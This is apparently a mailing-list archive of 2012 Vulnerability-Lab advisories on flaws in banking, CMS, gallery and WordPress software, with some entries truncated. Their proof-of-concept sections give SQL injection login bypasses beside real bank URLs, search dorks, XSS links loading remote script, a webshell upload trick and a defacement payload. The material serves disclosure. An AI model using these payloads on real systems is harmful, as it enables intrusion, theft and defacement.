-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability

Title:
==
BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability


Date:
=
2012-07-09


References:
===
http://www.vulnerability-lab.com/get_content.php?id=654


VL-ID:
=
654


Common Vulnerability Scoring System:

8.5


Abstract:
=
A Vulnerability-Lab researcher discovered an SQL injection vulnerability in the 
Beneficial Bank Business Banking v4.13.1 CMS.


Report-Timeline:

2012-07-09: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A Auth Bypass vulnerability is detected in the Beneficial Bank Business Banking 
4.13.1 Content Management System.
Remote attackers without privileged user accounts can execute/inject own sql 
commands to compromise the application dbms.
The vulnerability is located in the login module with the bound vulnerable 
Company ID  Company Password parameters. 
Successful exploitation of the vulnerability result in dbms (Server) or 
application (Web) compromise  unauthorized 
web application (admin/customer) panel access.

Vulnerable Section(s):
[+] Login

Vulnerable Parameter(s):
[+] User  Pass


Proof of Concept:
=
The login auth bypass vulnerability can be exploited by remote attacker without 
privileged user account. For demonstration or reproduce ...

PoC:
user : ' or 1=1--
pass : ' or 1=1--

URL: 
http://www.thebeneficial-ebanking.com/customer_demo/index2.html
https://www.frontrangebankonline.com/customer_demo/index2.html
http://www.libertybaybank.com/customer_demo/index2.html
http://www.fs-bankonline.com/customer_demo/index2.html
http://www.centralstateonline.com/customer_demo/index2.html
http://www.hvbonlinebanking.com/customer_demo/index2.html


Risk:
=
The security risk of the auth bypass vulnerability is estimated as critical.


Credits:

Vulnerability Research Laboratory -  Chokri Ben Achor 
(meis...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Flogr v2.5.6 v2.3 - Cross Site Script Vulnerabilities

2012-08-09 Thread Vulnerability Lab

Title:
==
Flogr v2.5.6  v2.3 - Cross Site Script Vulnerabilities


Date:
=
2012-07-11


References:
===
http://www.vulnerability-lab.com/get_content.php?id=656


VL-ID:
=
656


Common Vulnerability Scoring System:

2


Introduction:
=
Flogr is a flexible script that displays your flickr photos in a customizable 
photo gallery you host on your website. 
If you use flickr but want to have a different look and feel for your photo 
gallery you may like flogr.

Customizable photoblog interface for your flickr photos
Display all flickr photos, only photos with certain tags or only certain 
photosets
Displays photo details, EXIF data, tags, geo location, and photo comments
Thumbnail viewer displays photos by date taken, photoset, and tag
Embedded Slimbox photo slideshow
Map view of your geo tagged photos
Flickr tag cloud page
RSS 2.0 support 

(Copy of the Vendor Homepage:  https://code.google.com/p/flogr/ )


Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered 
mutliple non persistent Cross Site Scripting 
Vulnerabilities in the Flogr v2.5.6  v2.3 photo gallery CMS.


Report-Timeline:

2012-07-11: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple non persistent cross site scripting vulnerabilities are detected in 
the Flogr v2.5.6  v2.3 photo gallery CMS.
The vulnerability allows remote attackers to hijack website customer, moderator 
or admin sessions with high required 
user inter action or local low privileged user account. The vulnerabilities are 
located in the recent.php  index.php 
with the bound vulnerable tag parameter. Successful exploitation can result in 
account steal, phishing  client-side 
content request manipulation.


Vulnerable Module(s):
[+] Recent Listing
[+] Index Listing

Vulnerable File(s):
[+] Recent.php
[+] Index.php

Vulnerable Parameter(s):
[+] Tag


Proof of Concept:
=
Dork(s): 
inurl:tag= powered by flogr v2.3
inurl:tag= powered by flogr v2.5.6
inurl:tag= powered by flogr v1.7 

PoC:
http://[TARGET]/recent.php?tag=[CROSS SITE SCRIPTING]
http://[TARGET]/index.php?tag=[CROSS SITE SCRIPTING]

Reference(s):
xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E
xxx.com/bigpictureproject/index.php?tag=script src%3d//xxx.com/s/script
xxx.com/flogr/recent.php?tag=script src%3d//xxx.com/s/script
xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E


Risk:
=
The security risk of the client side cross site scripting vulnerabilities are 
estimated as low(+)|(-)medium.


Credits:

Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific

Joomla com_fireboard - SQL Injection Vulnerability

2012-08-09 Thread Vulnerability Lab

Title:
==
Joomla com_fireboard - SQL Injection Vulnerability


Date:
=
2012-07-11


References:
===
http://www.vulnerability-lab.com/get_content.php?id=655


VL-ID:
=
655


Common Vulnerability Scoring System:

7.3


Introduction:
=
Joomla is a free and open source content management system (CMS) for publishing 
content on the World
Wide Web and intranets and a model–view–controller (MVC) Web application 
framework that can also be
used independently.

Joomla is written in PHP, uses object-oriented programming (OOP) techniques and 
software design
patterns, stores data in a MySQL database, and includes features such as page 
caching,
RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and 
support for language
internationalization.

Joomla had been downloaded 23 million times. Between March 2007 and February 
2011 there had been
more than 21 million downloads. As of November 2011, there are over 8,600 free 
and commercial
extensions available from the official Joomla! Extension Directory and more 
available from other sources.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla)


Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a 
SQL Injection Vulnerability in 
the com_fireboard module of the joomla CMS.


Report-Timeline:

2012-07-11: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A SQL Injection vulnerability is detected in the com_fireboard module of the 
joomla Content Management System.
Remote attackers  low privileged user accounts can execute/inject own sql 
commands to compromise the application dbms.
The vulnerability is located in the com_fireboard module with the bound 
vulnerable func fb_ parameter. 
Successful exploitation of the vulnerability result in dbms (Server) or 
application (Web) compromise.

Vulnerable Module(s):
[+] index.php?option=com_fireboard

Vulnerable Parameter(s):
[+] func fb_


Proof of Concept:
=
The sql injection vulnerability can be exploited by remote attackers without 
user inter action  with low 
privileged user account. For demonstration or reproduce ...

Dork(s):
inurl:id=  intext:/com_fireboard/

PoC:
http://[TARGET]/index.php?option=com_fireboardItemid=0id=1catid=0func=fb_pdf'[SQL-INJECTION]

Reference(s):
xxx.com/index.php?option=com_fireboardItemid=0id=1catid=5func=fb_pdf'[SQL-INJECTION]
xxx.com/2012/index.php?option=com_fireboardItemid=79id=1catid=2func=fb_pdf'[SQL-INJECTION]
xxx.com/fireboard/index.php?option=com_fireboardItemid=38id=22111catid=16func=fb_pdf'[SQL-INJECTION]
xxx.com/board/index.php?option=com_fireboardItemid=54id=70122catid=12func=fb_pdf'[SQL-INJECTION]
xxx.com/jmfireboard/index.php?option=com_fireboardItemid=54id=70122catid=12func=fb_pdf'[SQL-INJECTION]


Risk:
=
The security risk of the remote sql injection vulnerability is estimated as 
high(+).


Credits:

Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other

Arasism (IR) CMS - File Upload Vulnerability

2012-08-09 Thread Vulnerability Lab

Title:
==
Arasism (IR) CMS - File Upload Vulnerability


Date:
=
2012-07-12


References:
===
http://www.vulnerability-lab.com/get_content.php?id=657


VL-ID:
=
657


Common Vulnerability Scoring System:

6.5


Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a 
File Upload Vulnerability in the Arasism CMS.


Report-Timeline:

2012-07-12: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A File Upload vulnerability is detected in the famous iranisch Arasism.com 
Content Management (Panel) System.
The vulnerability allows an attacker (remote) with low privileged user account 
to bypass the picture upload 
validation when processing by including own .asp/.php files. Successful 
exploitation of the vulnerability 
result in malicious file uploads (malware or webshells) to compromise the 
application dbms  application system.

Vulnerable Path:
[+] ../sysop/


Vulnerable File(s):
[+] RTE_popup_file_atch.asp


Proof of Concept:
=
The remote file upload vulnerability can be exploited by remote attacker 
without user inter action.
For demonstration or reproduce ...


Dork(s):
Powered by Arasism.com
Designed  Powered By Hadi Farzad
Powered By : www.Arasism.Com
ØÑÇÍí æ ÇÌÑÇ : åÇÏí ÝÑÒÇÏ | íÔÇãÇä æÈ ÝÑÏÇ


PoC:
Path:   ../sysop/
File:   RTE_popup_file_atch.asp
NOTE:   To upload an asp web shell inject a filename with for example ...  
shell.asp;1.jpg


Risk:
=
The security risk of the remote file upload vulnerability is estimated as high.


Credits:

Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities

2012-08-14 Thread Vulnerability Lab

=value
input[NON PERSISTENT SCRIPT CODE] class=numeric field_from w50 
type=text 
name=f[price][from] maxlength=15img
 alt= 
src=http://general.demoflynax.com/templates/general_modern/img/blank.gif;
 class=between /input value=iframe src=a 
class=numeric field_to w50 type=text name=f[price][to] 
maxlength=15 /
/div

URL: http://general.[SERVER]:1339/search.html


Risk:
=
1.1
The security risk of the remote sql injection vulnerability is estimated as 
critical.

1.2
The security risk of the persistent input validation vulnerabilities are 
estimated as medium(+).

1.3
The security risk of the non persistent cross site scripting vulnerabilities 
are estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities

2012-08-14 Thread Vulnerability Lab

Title:
==
7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities 


Date:
=
2012-08-12


References:
===
http://www.vulnerability-lab.com/get_content.php?id=679


VL-ID:
=
680


Common Vulnerability Scoring System:

8.3


Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered 
multiple SQL Injection Vulnerabilities in the 7sepehr CMS.


Report-Timeline:

Vulnerability Laboratory [Research Team]  - Ibrahim El-Sayed [storm] 
(st...@vulnerability-lab.com)


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

Multiple SQL Injection vulnerabilities are detected in the official 7sepehr.com 
Content Management System 2012. 
Remote attackers can execute/inject own sql commands to compromise the affected 
application dbms. The vulnerabilities 
are located in the news_detail, news_view and content asp modules with the 
bound vulnerable id parameter. 
Successful exploitation of the remote sql injection vulnerability result in 
dbmsor web application compromise. 


Vulnerable File(s):
[+] news_Detail.asp
[+] newsview.asp
[+] contents.aspx

Vulnerable Parameter(s):
[+] id



Proof of Concept:
=
The remote sql injection vulnerabilities can be exploited by remote attackers 
without privileged user account  
without required user inter action. For demonstration or reproduce ...

Dork:  `Powered by 7sepehr.com`

PoC:
http://127.0.0.1:1338/news/news_Detail.asp?id=-1 union all select [SQL 
INJECTION VULNERABILITY]--  
http://127.0.0.1:1338/news/newsview.asp?id=-1 union all select [SQL INJECTION 
VULNERABILITY]--  
http://127.0.0.1:1338/contents.aspx?id=-1 union all select [SQL INJECTION 
VULNERABILITY]--


Risk:
=
The security risk of the remote sql injection vulnerabilities are estimated as 
critical.


Credits:

Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Social Engine v4.2.5 - Multiple Web Vulnerabilities

Title:
==
Social Engine v4.2.5 - Multiple Web Vulnerabilities


Date:
=
2012-07-31


References:
===
http://www.vulnerability-lab.com/get_content.php?id=672


VL-ID:
=
672


Common Vulnerability Scoring System:

3


Abstract:
=
A Laboratory Researcher [X-Cisadane] discovered multiple Web Vulnerabilities in 
the Social Engine v4.2.5 web application.


Report-Timeline:

2012-07-31: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

1.1
Multiple persistent input validation vulnerabilities are detected in the Social 
Engine v4.2.5 web application.
The bug allows an attackers to implement/inject malicious script code on the 
application side (persistent). 
The persistent vulnerabilities are located in the add- new videos and 
classiefieds module with the bound vulnerable 
tag (keywords) parameter. Successful exploitation of the vulnerability can lead 
to persistent session hijacking (manager/admin) 
or stable (persistent) context manipulation. Exploitation requires low user 
inter action but a privileged user account. 


Vulnerable Module(s):
  [+] Add New Video
  [+] Add New Classfields


Affected Module(s):
  [+] Videos Listing Page
  [+] Classfields Listing Page


Vulnerable Parameter(s):
  [+] Tags (keywords)


1.2
A non persistent cross site scripting vulnerability is detected in the Social 
Engine v4.2.5 web application.
The vulnerability allows remote attackers to hijack website customer, moderator 
or admin sessions with medium 
or high required user inter action or local low privileged user account. The 
bug is located in the  signup (profile) 
module with the bound vulnerable name and address parameters. Successful 
exploitation can result in account steal, 
client side phishing  client-side content request manipulation. Exploitation 
requires medium or high user inter 
action  without privileged web application user account.

Vulnerable Module(s):
[+] Profile - Signup

Vulnerable Parameter(s):
[+] Name  Address


Proof of Concept:
=
1.1
The persistent vulnerability can be exploited by remote attackers with low 
required user inter action  low privileged 
application user account. For demonstration or reproduce ...


- In the Post New Video Page (http://127.0.0.1:8080/videos/create) 
Information:Copy  Paste persistent malicious script coe (js/html) into the 
Tags (keywords) field and save the context


- In the Post New Classfields Listing Page 
(http://127.0.0.1:8080/classifieds/create)
Information:Copy  Paste persistent malicious script coe (js/html) into the 
Tags (keywords) field and save the context


Picture :   http://i47.tinypic.com/2ptcv29.png
Picture :   http://i50.tinypic.com/14soaci.png


PoC:

DIV align=left
DIV id=Layer1 style=BORDER-RIGHT: #00 1px; BORDER-TOP: #00 1px; 1; 
LEFT: 1px; 

BORDER-LEFT: #00 1px; WIDTH: 1500px; BORDER-BOTTOM: #00 1px; POSITION: 
absolute; 

TOP: 0px; HEIGHT: 5000px; BACKGROUND-COLOR: #00; layer-background-color: 
#00 
br /br /
br
center
font face=Arial color=red size=4strongbrbrbrDefaced By : 
X-Cisadane
br
/center 
font face=Courier New color=#FF size=3centerGreetz To : X-Code, 
Borneo Crew, 

Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Winda 

Utari/center/font 
centerimg 

src=http://obnoxiousgamer.files.wordpress.com/2010/01/jollyroger.gif;/img/center
centerfont face=arial size=3 color=#FF 
marquee behavior=alternate scrolldelay=100 style=width: 90%Please fix 
your hole!
/li
/ul
/td
/tr
/table
/div



1.2
The non persistent cross site scripting vulnerability can be exploited by 
remote attackers with medium or high required 
user inter action and without privileged user account. For demonstration or 
reproduce ... 

Information:Copy  Paste cross site scripting (script code) into the 
Profile Address Field of the signup form
URL:http://127.0.0.1:8080/signup

Picture :   http://i45.tinypic.com/v46iyd.png
Picture :   http://i49.tinypic.com/156e79h.png



Risk:
=
1.1
The security risk of the persistent web vulnerabilities are estimated as 
medium(+).

1.2
The security risk of the client side cross site scripting vulnerability is 
estimated as low(+).


Credits:

X-Cisadane


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental

ShopperPress v2.7 Wordpress - SQL Injection Vulnerability

Title:
==
ShopperPress v2.7 Wordpress - SQL Injection Vulnerability


Date:
=
2012-08-01


References:
===
http://www.vulnerability-lab.com/get_content.php?id=669


VL-ID:
=
669


Common Vulnerability Scoring System:

6.1


Introduction:
=
ShopperPress is a Premium Wordpress theme with addon that transform Wordpress 
into a fully functionality online 
store with shopping cart functionality. ShopperPress is the ideal solution for 
anyone who wants to sell products 
 services, digital downloads or affiliate products online, you can even setup 
a catalog website. ShopperPress has 
been designed and tested to make setup and store management easy. Suitable for 
users of all levels, ShopperPress 
makes running an online store enjoyable whilst giving you all the professional 
tools required.ShopperPress has been 
optimized for search engines helping your store quickly rank high in all major 
search engines.You can also add-on 
Wordpress SEO plugins to help you customize meta tags and page titles. 
ShopperPress can create online stores, 
affiliate stores and even catalog websites. Every copy of ShopperPress includes 
Amazon, Ebay and CSV import tools, 
20+ payment gateways, 20+ store designs, shipping, tax, promotions, coupons, 
emails and lots more! ShopperPress 
includes 20+ different payment gateways allowing you to choose how your 
visitors pay for your products/services. 
We have integration for Paypal (standard and Pro), 2Checkout, Worldpay, eWay, 
Google Checkout, Authorize.net and 
lots more Built into ShopperPress are 20+ different store designs to choose 
from, all included free! Customizing 
your theme is quick and easy using the on/off display options found in the 
admin area with full support for 
plugins  widgets. ShopperPress has a built in order management system allowing 
you to manage your orders. You 
can easily view your order history, export to CSV, view product, billing and 
shipping details as well as print 
off customer invoices. With ShopperPress you can create custom product options 
such as colors and sizes. You 
can create up to 6 different product values which will be passed with the 
product to checkout as well as allow 
members to upload files. [24/7 Customer Support]We work hard to ensure our 
customers are 100% satisfied with our 
product which is why we offer a 24/7 customer support services.

(Copy of the Vendor Website:  http://shopperpress.com )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a SQL Injecction 
Vulnerability in the Shopperpress official Premium Wordpress Theme and Addon 
v2.7.


Report-Timeline:

2012-08-01: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A SQL Injection vulnerability is detected in the Shopperpress official Premium 
Wordpress Theme and Addon v2.7. 
Remote attackers with privileged user accounts  module access can 
execute/inject own sql commands to compromise 
the wordpress application dbms. The vulnerability is located in the listing 
modules with the bound vulnerable 
id parameter. Exploitation requires privileged user account or module access 
rights.

Vulnerable Module(s):
[+] Listing - [Edit]

Vulnerable Parameter(s):
[+] ID


Proof of Concept:
=
The sql injection vulnerability can be exploited by a privileged wordpress user 
account without user inter action. For demonstration or reproduce ...

PoC:
http://shopperpress.127.0.0.1:38/wp-admin/admin.php?page=ordersid=5-261343282-1%27union
 select[SQL-INJECTION!]--

--- SQL Exception Logs ---
 You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right 
syntax to use near '[SQL-INJECTION!]' GROUP BY order_id LIMIT 1' at line 1 on 
line: 80


Solution:
=
The vulnerability can be patched by parsing the id parameter of the edit 
functions in the addon module files.


Risk:
=
The security risk of the sql injection vulnerability is estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so

ShopperPress v2.7 Wordpress - Cross Site Vulnerabilities

; 
color:#666;padding:5px; value=Search Files
/form
div class=clearfix/div
form class=plain method=post name=orderform id=orderform
input type=hidden name=deleteimages value=1

   
Review: Member Add/Edit Listing

ul
lia rel=premiumpress_tab1 href=# class=activeDetails/a/li
lia href=# onclick=window.location.href='admin.php
?page=orderscid=5[CLIENT SIDE MALICIOUS SCRIPT CODE]) 
width=800Order History/a/li
!--lia href=admin.php?page=membersSearch Results/a/li--
/ul
/div
div id=videobox1/div
form method=post target=_self enctype=multipart/form-data
input name=action type=hidden value=edit /
input name=userdata[ID] type=hidden value=5[CLIENT SIDE MALICIOUS 
SCRIPT CODE])  /
input type=hidden value= name=showThisTab id=showThisTab /
div id=premiumpress_tab1 class=content


Review: EMail Add/Edit

div id=premiumpress_tab1 class=content
form class=fields method=post target=_self enctype=multipart/form-data
input name=action value=edit type=hidden
input name=ID value= 
type=hidden[CLIENT SIDE MALICIOUS SCRIPT CODE];) width=800
input type=hidden name=form[email_type] value=email /
fieldset
div class=titlehh3Email Options/h3/div


Solution:
=
The vulnerability can be patched by parsing the orders, id  search web 
application parameters.


Risk:
=
The security risk of the non persistent cross site scripting vulnerabilities 
are estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
